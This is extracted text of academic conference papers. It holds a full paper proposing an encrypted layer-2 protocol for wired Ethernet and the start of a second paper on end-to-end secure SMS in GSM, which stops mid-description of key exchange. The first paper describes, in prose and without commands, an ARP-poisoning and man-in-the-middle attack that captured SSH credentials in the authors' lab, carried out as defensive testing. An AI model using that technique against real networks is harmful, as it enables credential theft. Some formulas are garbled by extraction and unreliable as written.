(MESCYT)

Santo Domingo, Dominican Republic

Email: [email protected]

Tae (Tom) Oh Dept. of Information Sciences and Technologies

Rochester Institute of Technology

Rochester, NY 14623

Email: [email protected]

Abstract—Data encapsulated using the IP protocol can be

compromised if it is sent in clear text or without integrity

protection. Even using known protocols to protect the

confidentiality, integrity and authenticity of this data, the

EtherType field of the Ethernet frames and the header of the IP

packets in a wired Ethernet network still remain exposed

opening possibilities for an attacker to gain knowledge of the

network, cause a denial of service attack or steal information.

This paper proposes a new protocol that protects the

confidentiality, integrity and authenticity of the IP

communication in a wired Ethernet network. This new protocol

operates in the layer 2 of the OSI model. For each Ethernet

frame, it encapsulates the EtherType field and the entire IP

packet into a new PDU structure that is partially encrypted.

Integrity and authenticity are assured by an HMAC value or a

digital signature calculated over the entire frame. Several tests

were performed to analyze the security characteristics and

performance impact of our proposed solution. The results of

these tests demonstrate that all traffic is effectively protected

and that an attacker wouldn’t know the type of protocols, IP

addresses or any other data travelling across the network. It is

also demonstrated that under certain conditions, performance

is not highly impacted and is feasible to protect the network

communication with our new protocol.

Keywords—layer 2 protocol; wired ethernet network; security;

pdu; ip communication.

I. INTRODUCTION

The IP protocol is one of the key elements that make communication possible in today’s data networks; its main purpose is to provide an addressing mechanism for the delivery of data between two hosts regardless of their physical location [5]. Data communicated using this protocol is encapsulated into IP packets [6] that, in their basic structure, are sent over the network in clear text allowing any eavesdropper to read the entire content of what has been transmitted; moreover, the IP communication was designed without taking into consideration any need of confidentiality [8], and by default, all data transmission between two hosts can be compromised.

Known protocols, as for example TLS, SSH and IPSec, have been developed to protect the confidentiality and integrity of the information transmitted over IP [7], but fail to offer this protection to the header of the IP packets leaving it exposed in clear text and opening possibilities for an attacker to gain

knowledge of the network, disrupt the communication or steal information. In the case of wireless Ethernet networks, this problem has been thoroughly approached, and protocols such as WPA and WPA2 were developed as a solution to protect the confidentiality and integrity of the entire IP packets, including the IP header and the transmitted data [1]; however, the problem is still present in wired Ethernet networks. In order to protect the entire IP communication in these networks, it is necessary to increase security at the OSI’s layer 2 level by offering confidentiality protection to the EtherType field of the Ethernet frame and the encapsulated IP packet, and integrity protection to the entire Ethernet frame.

Some solutions have been proposed to address the lack of confidentiality and/or integrity of the transmitted data over wired Ethernet networks. The PPP Encryption Control Protocol, for example, defines a standard method to encrypt the information in a PPP link, but it doesn’t specify any method to protect the integrity or authenticity of the transmitted data, providing only confidentiality protection [9]. The IEEE also proposed a solution with the standard IEEE 802.1AE called MACSEC [2] and provides confidentiality, integrity and authenticity protection at the layer 2 level; however, its implementation can represent a huge investment in new hardware, limiting the scenarios where it can be implemented. Another solution was proposed by Yves Igor Jerschow, Christian Lochert, Bjorn Scheuermann and Martin Mauve [4] with a protocol called Cryptographic Link Layer (CLL) which provides authentication, integrity, confidentiality and replay attack protection to the IP packets in the link layer; however, this protocol strongly relies on digital certificates to authenticate hosts. In addition, encryption of data is optional and doesn’t include ARP, broadcast or DHCP packets.

In this paper, we propose a new layer 2 protocol called Packet Security Protocol (PSP) to protect the confidentiality, integrity and authenticity of the IP communication in a wired Ethernet network. Our proposed solution is designed for flexibility, allowing the use of multiple encryption and hashing algorithms as well as multiple digital certificate standards. When protecting data with PSP, the ethertype field of the Ethernet frame is replaced with a new value that indicates the PSP protocol; the protected data is then encapsulated into a new PDU structure that includes the original EtherType field of the Ethernet frame and the entire IP packet, both encrypted with a symmetric key, and an integrity check value that can be either an HMAC value or a digital signature calculated over the

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 60

entire Ethernet frame. Our proposed protocol also includes multiple options to protect the communication against reply attacks.

To demonstrate the proof of concept of our solution, we will develop a program in C++ that implements the new protocol in a Linux operating system. This demonstration will be based on a methodology consisting of two parts. First, we will analyze the security of our proposed protocol by performing different attacks to compromise the communication between two hosts, and later, we will protect the same communication with our solution; we will also analyze the impact on security caused by the use of different modes of operation of a block cipher. Second, we will run multiple tests to 4 different protocols to measure the performance of the network and the performance of the hosts using our proposed solution.

II. RELATED WORK

Research and development of protocols and technics to protect, in the layer 2 of the OSI model, the confidentiality or integrity of the information transmitted over a wired network expands to several solutions that, to our understanding, don’t offer a complete protection to the information.

The Point to Point Protocol (PPP) is a well-known solution used to transmit other protocol’s packets in a point to point link. Several methods have been defined to increase the functions of this protocol, including the ability to encrypt the entire encapsulated packet as specified in the PPP Encryption Control Protocol (ECP) [9]. This protocol defines a standard method to encrypt information in a PPP link and is open to any encryption algorithm, but it doesn’t specify any method to protect the integrity or authenticity of the information being transmitted, providing only confidentiality protection [9]. Another disadvantage of the ECP protocol is that it can be used just after the Link Establishment Phase and the Authentication Phase of the PPP protocol, and not before. It means that an attacker can sniff the entire Link establishment phase of PPP in clear text and send multiple attacks to avoid a successful link negotiation.

The IEEE developed the IEEE 802.1AE standard known as the media access control security (MacSec) standard for local and metropolitan area networks. It provides confidentiality and integrity protection to trusted network hosts. MacSec uses the terms Mac Security Entity (SecY) to define the host or network element that uses MacSec, and Secure Association Key (SAK) to define the secret key used between two hosts that have established a Secure Association [2]. Even though MacSec defines encryption and integrity protection, it has to rely on the standard IEEE 802.1X-2010 for authentication and key management [3].

MacSec combined with IEEE 802.1X-2010 offers a good protection to the layer 2 frames; however, it must be supported by the physical hardware of the network including network switches. This condition may force to make investment in new hardware, limiting the number of scenarios where it can be adopted.

Yves Igor Jerschow, Christian Lochert, Bjorn Scheuermann and Martin Mauve [4] proposed a protocol called Cryptographic Link Layer (CLL) which provides

authentication, integrity, confidentiality and replay attack protection to the IP packets in the link layer. The Cryptographic Link Layer relies on digital certificates and HMAC values to authenticate the frames transmitted by a host. In the case of digital certificate, it binds the Mac and IP address of the host and the receiver can always validate the authenticity of the frame based on these parameters.

CLL uses timestamps to protect the ARP and security association packets from reply attacks. It also relies exclusively on digital certificates to authenticate ARP, DHCP and broadcast packets and doesn’t include another way to authenticate these. CLL is not open to disable timestamps or digital certificates, which requires the network to have a certificate authority and a way to keep all hosts with their clocks synchronized. These two requirements, depending on the scenario, can significantly increase the administrative tasks of the network.

CLL offers optional confidentiality protection and only unicast IP packets can be encrypted, and it occurs only after two hosts have established a security association. CLL doesn’t offer the option to encrypt ARP, DHCP or broadcast packets which, allows eavesdroppers to always know the type of traffic that is being transmitted and the IP addresses and all other fields of the IP header of the packets.

III. PROBLEM STATEMENT

Data communication between two hosts is based on the OSI and the TCP/IP layered models [11]. If a layer is protected but then encapsulated into a less secure layer, a weak link in the security of the communication is created giving the attackers the possibility to gain knowledge of the network, disrupt the communication, cause a denial of service, impersonate one of the involved parties or steal information. This is exactly the existing problem in wired Ethernet networks. Security protocols, as for example IPsec, SSH or TLS, can protect the transmitted data; however, this protection occurs in the network and upper layers of the OSI model [7], leaving the EtherType field of the Ethernet frames and the header of the IP packets exposed in clear text absent from any confidentiality and integrity protection. Timo Kiravuo, S¨arel¨a, and Jukka Manner [12] list ARP and DHCP poisoning, Man in the Middle and session Hijacking as possible attacks that can affect communication in an Ethernet segment. These attacks can be performed taking advantage of a lack of confidentiality and integrity protection of the IP packet, including information disclosed in the IP header.

In the case of ARP Poisoning, the ARP protocol was not designed with a security approach [13] and the fact that any host in the network can send ARP request and receive ARP reply packets in clear text from any other host make this protocol an easy target for an attacker.

Similar to ARP, the DHCP protocol suffers from the same lack of security in its design [14, 15], and it is vulnerable to several attacks due to its messages being sent in clear text and the protocol not having authentication of origins of messages [14].

We also make reference to Kenneth G. Paterson and Arnold K. L. Yau [16], and to Kenneth G. Paterson and Jean Paul Degabriele [17] who demonstrated several attacks that allow

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 61

compromising the information transmitted over an IPSec tunnel using ESP encryption without integrity protection. Dongxiang Fang, Peifeng Zeng and, Weiqin Yang [18] took the idea presented in [17] and adapted it to work on IPv6. The attacks presented in [16, 17, 18] are possible because attackers can have access to an unencrypted IP header and can tamper the captured packets because these are not integrity protected.

IV. PACKET SECURITY PROTOCOL

In this paper, we propose the creation of a new layer 2 protocol that will provide a secure transmission preserving the confidentiality, integrity and authenticity of the information sent over a wired Ethernet network. From this point on, we will refer to our proposed protocol as Packet Security Protocol or PSP.

As a way to protect the IP communication and avoid attacks based on information disclosed by any field in clear text, packet injection or data tampering, PSP encrypts the value of the EtherType field and the whole network packet and encapsulates it into a new protocol data unit (PDU) that contains a new header, the encrypted data and an integrity check value calculated for the entire layer 2 frame.

Taking the OSI model as a reference in a regular data network communication, layer 3 packets are encapsulated into a layer 2 frame and then transmitted over a physical medium. As shown in Fig. 1, PSP respects and works together with the traditional encapsulation process, but instead of encapsulating the network packet directly into a layer 2 frame, it is first encapsulated into the PSP Protocol Data Unit, and then this PSP PDU is encapsulated into a layer 2 frame before being transmitted over a physical medium.

Fig. 1. PSP Encapsulation

By default, PSP encrypts the data with a shared symmetric key using the Blowfish encryption algorithm in Cipher Block Chaining mode, and calculates an HMAC value using the SHA-1 hashing algorithm to protect the integrity and authenticity of the frame; however, it’s open to support other encryption and hashing algorithms as well as digital certificate standards.

V. PDU STRUCTURE

The PSP Protocol Data Unit (PDU) is composed of 3 sections as depicted in Fig. 2: clear text header, encrypted payload and integrity check value.

Fig. 2. PDU Structure

The clear text header has information about the PSP version and the different security parameters used to protect the data.

The encrypted section guarantees the confidentiality of the protected data. It contains a sub header, the protected data and padding bytes necessary to complete a block size when a block cipher is used for encryption. All fields in this section are encrypted with a defined cryptographic key using an encryption algorithm and can only be extracted or analyzed once the section has been decrypted. The original value of the EtherType field and the entire layer 3 packet are contained within this section.

The integrity check value (ICV) section guarantees the integrity and authenticity of the frame. This section contains either an HMAC value or a Digital Signature calculated for the entire layer 2 frame, but not both.

VI. PSP COMMUNICATION PROCESS

PSP works at the layer 2 of the OSI model. It must be configured, along with a common default Pre-Shared Symmetric Key, on all devices that will talk directly to each other in a communication network. All data transmitted over the network including unicast, broadcast and multicast messages, is confidentiality, integrity and authenticity protected.

The communication between 2 devices that are protected with PSP involves a process of three sequential steps: Address Mapping, Communication Session Establishment, and Session Key Mapping.

The first process is to map the network address of the peer host with its hardware address. This process is accomplished using the ARP protocol or any other mechanism to map network and hardware addresses. Up to this point, all packets sent over the network are encrypted and their integrity and authenticity is calculated using a default pre-shared symmetric key. Once the address mapping is done, PSP uses a Session Establishment Protocol to establish a communication session and be able to exchange data with the peer host; during this process, a new session key that is unique for both devices is created to encrypt the communication and avoid using the default Pre-Shared Symmetric Key. After the communication session has been established, both hosts do a Session Key to Hardware Address Mapping. With this process, by creating an association between a session key and the hardware address of the peer, a device can know what session key and parameters to use to decrypt or encrypt data.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 62

VII. IMPLEMENTATION OF THE PROPOSED SOLUTION

We have developed a computer program in C++ to demonstrate the proof of concept of our proposed solution. This demonstration was based on a methodology consisting of a security and a performance analysis. First, we analyzed the security of our proposed protocol by performing different attacks to compromise the communication between two hosts, and later, we protected the same communication with our solution; we also analyzed the impact on security caused by the use of different modes of operation of a block cipher. Second, we ran multiple tests to 4 different protocols and applications to measure the performance of the network and the performance of the hosts using our proposed solution.

A. Network Scenario

As depicted in Fig. 3, our network scenario consists of three virtual machines - a network protocol analyzer capturing traffic for data analysis purposes, one client and one server all running the proposed Packet Security Protocol – that are connected to a virtual switch configured in promiscuous mode. An attacker not running the proposed Packet Security Protocol is connected to the same virtual switch and is sniffing the traffic of the network.

Fig. 3. Network Scenario

B. Test Categories and Tested Protocols

The following test categories were used in this

test methodology:

1) Ethernet without PSP applied. TOE disabled: The

purpose of this category is to establish a baseline and a

reference for all tests. Network protocols and services tested in

other categories were compared to this one and reflected the

network and system performance variation of the proposed

Packet Security Protocol.

In this category, all tests were conducted in a regular scenario where data is sent over the network with no encryption or manipulation of the payload, layer 3 or layer 2 headers. The network adapter of the Client and the Server had the TCP Offloading Engine (TOE), a feature of some network adapters to offload the TCP segments to the network adapter and improve cpu usage [10], disabled to mimic a regular network card. This is the most common scenario in today’s network environments.

Protocols tested under this category: ARP, ICMP, VoIP and Iperf- TCP.

2) Ethernet without PSP applied. TOE enabled: In this

category, all tests were conducted in a regular scenario where

data is sent over the network with no encryption or

manipulation of the payload, layer 3 or layer 2 headers. The

network adapter had the TCP Offloading Engine (TOE)

enabled.

The purpose of this category is to measure the impact of enabling vs disabling TOE on TCP related tests and how the advantages of enabling TOE are compromised by the proposed Packet Security Protocol. This includes CPU and bandwidth usage.

Protocols and services tested under this category: Iperf-TCP.

3) PSP-NoENC-NoHMAC: This category measures the

impact on network and system performance due to using Packet

Security Protocol without encryption and HMAC calculation.

Even though, the proposed protocol is not meant to be used

without encryption and HMAC calculation, this category shows

the processing overhead caused by the program developed to

prove the concept of Packet Security Protocol.

Protocols and services tested under this category: ARP, ICMP, VoIP and Iperf-TCP.

4) PSP Full: This category measures the real performance

of Packet Security Protocol, just as proposed in this paper, with

encryption and HMAC capabilities. The results of the tests run

on this category show the real processing overhead added by the

proposed protocol and the computer program developed to

prove the concept of the protocol.

C. Hardware and Software Specifications

1) Physical Machine Hosting the Virtual Machines: Cisco

UCS-C220-M3 Server with 2 Intel(R) Xeon(R) CPU E5- 2650

@ 2.0 Ghz, 32 GB Ram, Raid 1 with two 10,000 RPM 300 GB

Seagate ST9300605SS SAS HDD, Integrated dual-port Gigabit

Ethernet, VMware ESXi v5.1

2) Virtual Environment: Virtual machines running on

VMware ESXi v5.1. Each VM had the following specs: 2 x

vCPU Intel(R) Xeon(R) CPU E5-2650@ 2.0 Ghz, 4 GB Ram, 1

x Gigabit Ethernet Interface, Ubuntu Linux Desktop 12.04.2

LTS x64 Kernel 3.5.0-23-generic.

D. Developed Program

We developed a program in C++ to test the concept of the proposed Packet Security Protocol (PSP) on Ubuntu Linux. This program assumes that the communication session has already been established and encrypts the data using a defined static pre- shared key. It uses Blowfish in Cipher-Block Chaining (CBC) mode as the encryption algorithm and calculates the HMAC value of the frame using the SHA-1 function.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 63

VIII. TEST RESULTS

A. Security Analysis

This security analysis explores if known network attacks can be avoided using our solution. It also examines the possible security implications derived from using our solution with a block cipher in Electronic Codebook mode (ECB).

1) ARP Spoofing and Man in the Middle Attack: We

performed an ARP spoofing and Man in the Middle attack to

route the traffic of the affected hosts to an SSH honeypot

installed in our attacking station and capture user credentials of

the real server. This attack was performed against an

unprotected network to prove how vulnerable a wired Ethernet

network can be; we later performed the same attack to the

network protected with our solution to test if the attack can be

avoided.

First, we ran WireShark to sniff the network and discover the IP addressing scheme based on ARP broadcast messages. Next, we started Kippo, an SSH honeypot, in our attacking station. With the SSH honeypot up and running, we used Ettercap to sniff the network and perform an ARP poisoning and Man in the Middle attack against the discovered machines which, in this case, are a client and an SSH server.

After performing the attacks, we were able to manipulate all traffic between the affected machines. We redirected all SSH traffic from the client host to our SSH honeypot and started to log the user’s login attempts on what he thought was the real SSH server.

Later, we protected the network with our solution and tried to replicate the same ARP poisoning and Man in the Middle attacks. The frames captured by WireShark from our attacking station didn’t disclose any useful information that would allow us to detect the encapsulated protocols or the IP addressing scheme of the network. The client and the server machine, when running our proposed protocol, only understood traffic that was protected with our solution and not regular traffic in clear text.

It was impossible for us to replicate the attacks on the hosts protected with our Packet Security Protocol.

2) Vulnerabilities Derived From a Block Cipher in

Electronic Code Book Mode: For this study, we captured an

ARP-ICMP communication between a client and a server

protected with our proposed protocol.

Fig. 4. Data Encrypted Using Block Cipher in ECB Mode

When a block cipher in Electronic Codebook Mode (ECB) is used, patterns of encrypted data will be created and an attacker could extract more information from the captured frames. The frames captured by the attacker and depicted in Fig. 4 were protected with PSP, but data was encrypted using a block cipher in Electronic Codebook Mode. We can see that there is a repetitive pattern of 56 bytes in the encrypted section of the client to server and server to client frames. The attacker could take this pattern in his advantage and, employing brute force or other mechanisms, could decrypt the data. This is not a vulnerability of the proposed Packet Security Protocol, but a condition of the encryption algorithm that could result in an advantage for the attacker.

B. Performance Analysis

This analysis shows how network and host performance is impacted by the Packet Security Protocol. The performance efficiency of the protocol is based on the efficiency of the program we developed to prove the concept of our solution.

1) ARP-ICMP: The purpose of these tests was to measure

the Round Trip Time of the Address Resolution Protocol (ARP)

and the Internet Control Message Protocol (ICMP).

When we look at the test results of 3-PSP-FULL depicted in Fig. 5, we see that PSP and our developed program increased the RTT of ARP by 100.71% and 117% for ICMP. If we calculate the difference between 3-PSP-FULL and 2-PSP- noENC-noHMAC we can establish the overhead caused by the encryption/decryption and HMAC modules: 81.48% for ARP and 89.79% for ICMP.

Fig. 5. Round Trip Time of ARP and ICMP

These results are slightly correlated with the fact that ICMP frames are larger than ARP frames, resulting in more CPU processing due to frame construction and encryption.

2) VoIP: This test measured the performance of the

proposed Packet Security Protocol on Voice over IP

Applications. We used Asterisk v11.3.0 as our Voice over IP

Server and the SIPp program to simulate SIP calls and RTP

sessions.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 64

The test consisted in generating, for 60 seconds, a limit of 100 simultaneous calls at a rate of 8 calls per second from SIPp to an Asterisk SIP extension number using the G.711 Codec. This call rate was the maximum supported by our test environment without dropping any calls in a regular Ethernet communication.

Tests categories 1-Ethernet and 2-PSP-noENC-noHMAC had a 100% of successful calls. In the case of the proposed Packet Security Protocol and the developed program (3-PSP-FULL), only 9 calls out of 485 failed for a total of 98.14% of successful calls.

System performance is not highly impacted. The developed program used a maximum of 27.4 % of CPU time (3-PSP- FULL). Due to the fact that the network transfer rate was relatively low (586 KB/Sec), PSP didn’t have to encrypt/decrypt and calculate the HMAC values of too many packets.

3) Iperf-TCP: This test measured the performance of the

TCP protocol protected with the Packet Security Protocol.

To complete this test, we used Iperf with all default settings: TCP Window Size equals to 85.3 Kbytes and test duration of 10 seconds.

Fig. 6. Iperf-TCP Performance

We used test category 1-Ethernet as our baseline for all other results. In this scenario, test results of categories 3-PSP-noENC- noHMAC and 4-PSP-FULL showed, as depicted in Fig. 6, a very low performance compared to test category 1-Ethernet. Our developed program (test category 4-PSP-FULL) had only 3.42% of the network performance of our baseline while test category 3- PSP-noENC-noHMAC only had 30.69%. These results are very different to our findings on the previous tests, but what was slightly suggested before about the developed program in the ARP-ICMP tests, can be confirmed now: the higher the network traffic, the lower the network performance is.

This test gave us much information about the performance of the Proposed Packet Security protocol and the developed program. Test results of category 3-PSP-noENC-noHMAC showed that the developed application impacts in almost 70% the network performance. This condition worsened when encryption/decryption and HMAC algorithms were used, negatively impacting the network performance in almost 97%.

The developed program (test category 4-PSP-FULL) not only resulted in a low network performance, but in a high CPU usage as well. It used more than 90% of CPU time in test category 4- PSP-FULL. From this test result we were able to estimate that high network traffic protected by PSP will result in high CPU usage due to the fact that the developed application will have to encrypt/decrypt and calculate HMAC values at a very high speed.

IX. CONCLUSION

In this paper, we proposed a new layer 2 protocol called Packet Security Protocol (PSP) to protect the confidentiality, integrity and authenticity of the IP communication in a wired Ethernet network.

We ran several tests to analyze the security characteristics and performance impact of our proposed solution; the test results demonstrated that the Packet Security Protocol can effectively protect the network communication between two hosts and avoid network attacks based on packet injection, data tampering or information disclosed not only by IP packets, but by any protocol encapsulated into the layer 2 frames because the original EtherType field and the layer 3 data is encrypted, and the entire Ethernet frame is integrity protected. It was also demonstrated that the choice of a vulnerable cipher increases the chances of breaking the confidentiality protection offered by our protocol, as was the case of our experiments with a Block cipher in ECB mode. The test results also showed that high network traffic protected with our solution can result in reduced network transfer rates and high CPU utilization due to the processing overhead imposed by the encryption/decryption of data and the integrity check calculation. Our findings also indicated that TCP Offloading Engines used in today’s network cards will be rendered useless in a TCP communication protected with PSP, unless the firmware of these engines can be updated to use our proposed protocol.

Applying security to data communication in a Network environment can result in a trade-off that is mostly reflected in increased network administrative tasks, money investment and reduced network or host performance. Security must be thoroughly analyzed based on the real needs of the business and the different information security risks it can be exposed to.

REFERENCES

[1] T. Hardjono and L. Dondeti, Security in Wireless LANs and MANs.

Norwood, MA: Artech House, 2005, pp. 131-141, 143-154.

[2] IEEE Standard for Local and Metropolitan Area Networks: Media Access Control Security, IEEE Std 802.1AE, 2006.

[3] IEEE Standard for Local and Metropolitan Area Networks: Port-Based Network Access Control, IEEE Std 802.1X-2010, 2010.

[4] Y.I. Jerschow, C. Lochert, B. Scheuermann and M. Mauve. “CLL: a cryptographic link layer for local area networks.” Security and Cryptography for Networks, vol. 5229, pp. 21-38, 2008.

[5] C. Kozierok, The TCP/IP Guide. San Francisco, CA: No Starch Press, 2005, p. 236.

[6] C. Kozierok, The TCP/IP Guide. San Francisco, CA: No Starch Press, 2005, p. 330.

[7] P. Loshin, TCP/IP Clearly Explained. San Francisco, CA: Morgan Kaufmann Publishers, 2003, pp. 335-338, 551-580.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 65

[8] P. Loshin, TCP/IP Clearly Explained. San Francisco, CA: Morgan Kaufmann Publishers, 2003, p.551

[9] G. Meyer, The PPP Encryption Control Protocol (ECP). RFC 1968. June 1996.

[10] B. Sosinsky, Networking Bible. Indianapolis, IN: Wiley Publishing, Inc, 2009, pp. 437-440.

[11] B. Sosinsky, Networking Bible. Indianapolis, IN: Wiley Publishing, Inc, 2009, pp. 23-34.

[12] T. Kiravuo, M. Sarela and J. Manner. "A survey of ethernet LAN security." IEEE Communications Surveys & Tutorials, vol. 15, pp. 1477-1491, 2013.

[13] P. Pandey. "Prevention of ARP spoofing: a probe packet based technique." 2013 3rd IEEE International Advance Computing Conference (IACC), pp. 147-153, 2013.

[14] S. Duangphasuk, S. Kungpisdan and S. Hankla. "Design and implementation of improved security protocols for DHCP using digital certificates." 2011 17th IEEE International Conference on Networks, pp. 287-292, 2011.

[15] M. Yaibuates and R. Chaisricharoen. "ICMP based malicious attack identification method for DHCP." The 4th Joint International Conference on Information and Communication Technology, Electronic and Electrical Engineering (JICTEE), pp. 1-5, 2014.

[16] K. G. Paterson and A. K. L. Yau. "Cryptography in theory and practice: the case of encryption in IPSec." Advances in Cryptology - EUROCRYPT 2006, vol. 4004, pp. 12-29, 2006.

[17] J.P. Degabriele and K. G. Paterson. "Attacking the IPsec standards in encryption-only configurations." 2007 IEEE Symposium on Security and Privacy (SP '07), pp. 335-349, 2007.

[18] D. Fang, P. Zeng and W. Yang. "Attacking the IPsec standards when applied to IPv6 in confidentiality-only ESP tunnel mode." 16th International Conference on Advanced Communication Technology, pp. 401-405, 2014.

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 66

Proposed Terminal Device for End-to-End Secure

SMS in Cellular Networks

Neetesh Saxena

Department of Computer Science

SUNY, Korea, Incheon, South Korea

Department of Computer Science,

Stony Brook University, New York, USA

Email: [email protected]

Narendra S. Chaudhari Department of Computer Science and Engineering,

Visvesvaraya National Institute of Technology, India

Discipline of Computer Science and Engineering, Indian

Institute of Technology Indore, India

Email: [email protected]

Abstract—Nowadays, SMS is very popular mobile service and

even poor, illiterate, and rural areas living people use SMS

service very efficiently. Although many mobile operators have

already started 3G and 4G services but 2G services are still be

used by the people in many countries. In 2G (GSM), only

encryption provided is between the MS and the BTS, there is no

end-to-end encryption available. Sometimes we all need to send

some confidential messages to other people containing bank

account numbers, passwords, financial details, etc. Normally, a

message is sent in plain text only to the recipient and it is not an

acceptable standard for transmitting such important and

confidential information. Authors propose an end-to-end

encryption approach by proposing a terminal for

sending/receiving a secure message. An asymmetric key exchange

algorithm is used in order to transmit secret shared key securely

to the recipient. The proposed approach with terminal device

provides authentication, confidentiality, Integrity and non-

repudiation.

Keywords—SMS, GSM, GSM Terminal, encryption, non-

repudiation

I. INTRODUCTION

SMS messages are currently one of the most widespread forms of communication. It is a store-and-forward, easy to use, popular, and low cost service. There are many unusual or strange applications, such as devices which allow the switching on and off of house heating systems using an SMS [1], requests for public transport service in Asia [2], and payment applications which have been widely accepted in Europe and Asia [3], reminder for tuberculosis medication [4] and a general health care reminder system [5], and in selling theatre tickets [6]. SMS enables the transmission of up to 1120 bits alphanumeric messages between mobile phones and external systems. It uses SMS center for its routing operation in one network and can be transmitted into another network through the SMS gateway [7]. SMS usage is threatened with security concerns [8], such as eavesdropping, interception and modification.

SMS messages are transmitted as plaintext between the mobile stations and the SMS center using the wireless network. SMS content are stored in the systems of the network operators and can easily be read by their personnel. The A5 algorithm, which is the GSM standard for encrypting transmitted data, can easily be compromised. SMS tapping from radio broadcast, when SMS is sent or received from a mobile phone to base

transceiver station (BTS), is not easy. When a user is roaming, the SMS content passes through different networks and perhaps the Internet that exposes it to various vulnerabilities and attacks. To exploit the popularity of SMS as a serious business bearer protocol, it is necessary to enhance its functionalities to offer the secured transaction capability. Data confidentiality, integrity, authentication, and non-repudiation are the most important security services in the security criteria that should be taken into account in many secure applications. However, such requirements are not provided by the traditional SMS messaging.

II. LITERATURE REVIEW

This section describes related work in previous years considering encryption and key handling in GSM network.

Encryption: Many authors have used different encryption techniques to provide confidentiality to SMS transmitted messages. In a study by Lisonek and Drahansky [9], it was explained that RSA encryption scheme could provide security for less than 1120 bits of SMS, if a suitable padding scheme is used. Toolani and Shirazi [10] have proposed an SMS protocol that uses ECDLP to provide confidentiality for SMS m-payment system. Zhao et al. [11] in their study, explains the use of identity-based cryptography in securing mobile messaging. Harb et al. [12] has provided the use of 3DES session’s key in securing SMS. Garza-Saldana and Diaz-Perez in their study [13] explained how symmetric encryption could provide confidentiality to SMS mobile payment protocol. Kuate et al. [14] described and presented the implementation of an SMS security protocol called SMSsec which uses both asymmetric and symmetric encryption to provide confidentiality to SMS.

Key Management: Public key encryption is based on mathematical functions, computationally intensive and is not very efficient for small mobile devices [15]. Asymmetric encryption techniques are almost 1000 times slower than Symmetric techniques, because they require more computational processing power [16]. The disadvantage of the proposed model (explained later) is the need for exchange of symmetric encryption keys via a secured channel. The session secret key is generated at one MS and needs to transfer to another MS. There is no key establishment (management) protocol in GSM. Each Subscriber Identity Module (SIM) is burnt with a unique shared key which is also stored in

10th ANNUAL SYMPOSIUM ON INFORMATION ASSURANCE (ASIA '15), JUNE 2-3, 2015, ALBANY, NY

ASIA '15 67

Authentication Centre (AuC). The AuC stores keys for all the subscribers of a particular mobile switching centre (MSC). Both the SIM and AuC share the same key, thus symmetric key cryptography is used to achieve one way authentication of Mobile Equipment SIM (ME-SIM) by the network using a challenge response scheme. Like GSM, UMTS also provides no key management or establishment protocols and employs pre-shared secret keys [17].

III. EXISTING CELLULAR ARCHITECTURE

This section starts with the basic terminology of GSM network. Fig. 1 represents the basic architecture of GSM technology. The Base Transceiver Station (BTS) translates the radio signals into digital format and transfers it to the Base Station Controller (BSC). BSC controls multiple BTSs within a small geographical area. The BSC forwards the received signals to Mobile Switching Centre (MSC). MSC interrogates its databases (Home and Visitor Location Register (HLR and VLR)) for the location information about the destination mobile handset. If the signal originates or terminates at the fixed telephone line network then the signal will be routed from the MSC to the SMS Gateway MSC (SMS GMSC). If the received signal is an SMS then the message would be stored in the Short Message Service Centre (SMSC) and the message will wait to be delivered. Even after the SMS is delivered, the message content still maintains in the SMSC persistence database.

If the signal needs to be redirected internationally then the signal will be routed via the International Switching Centre (ISC) to another country. The maintenance is controlled by the Operation and Management Centre (OMC). The Equipment Identity Register (EIR) and Authentication Register (AUC) databases are used for equipment verifications and user authentication. The security mechanisms (for voice and data communication) of GSM are implemented in three different system elements; the Subscriber Identity Module (SIM), the GSM handset or MS, and the GSM network. Main focus of this paper is to provide end-to-end security of message during communication. During this process, authors also focus on its key management schemes and encryption approach used. The implications of doing end-to-end encryption are to provide encryption security between sender and receiver. Currently, there is no such kind of complete security solution exists; only the airway security provided is between the MS and the BTS. The message goes as plaintext from BTS to SMSC in GSM network which can result in message content disclosure by operator and, various threats and attacks by intruders on transmitted data from the MS.

Fig. 1. GSM Architecture

IV. PROPOSED SECURE APPROACH

Many security attacks exist on the SMS like man-in-

middle, reply, non-repudiation, and message disclosure. The

proposed approach provides authentication, confidentiality,

integrity and non-repudiation to the transmitted message. We

recommend the encryption algorithms to be stored onto the

SIM. Adding extra security means increasing more cost and for

this reason authors also propose to include one more service as

‘Secure Message’ in the menu of mobile software developed

by various mobile companies as shown in Fig. 2. The mobile

operators can add some extra charge to send these SMS(s) to

their customers. First, user as well as network authentication

(mutual) takes place similar to described in [22], unlike in the

existing GSM network where only unidirectional

authentication is provided. Whenever a user wants to send a

Secure Message to the other user, first the key management

algorithm execute which generates a secret shared key and then

encryption of the message takes place with symmetric

cryptography.

Fig. 2. Secure Message added in Menu

A. Key Management Process

Key management is handled with Diffie-Hellman key and Elliptic Curve Diffie-Hellman key exchange algorithms.

Diffie-Hellman Key Exchange: It is assumed that the global public elements, a prime no 'q' and one of its primitive root 'a' (where a<q) are known to all authorized MS. These values may vary from one mobile operator to another. If these global parameters are different for different mobile operators then it’s assumed that global elements of sender MS network will be used for the communication between the MS of different networks and it is the mobile operators’ responsibility to provide such secure global parameters among them.

Now, both MS will generate new secret private keys from their Kc (as Kc is stored in SIM and was used in authentication process) and let’s consider them as x1 and x2 respectively where x1 < q and x2 < q. Next, both MS calculate public keys

y1 and y2 respectively: q mod a y 1x

1 , and q moda y 2x

2 .

Both MS exchange their public keys y1 and y2 to each other as shown in Fig. 3, but exchange of data in an insecure medium is a challenge. Now, the secret shared key ‘k’ can be generated at

MS1 and MS2 as q mod y K 1x

2 , and q mod y K 2x

1 .

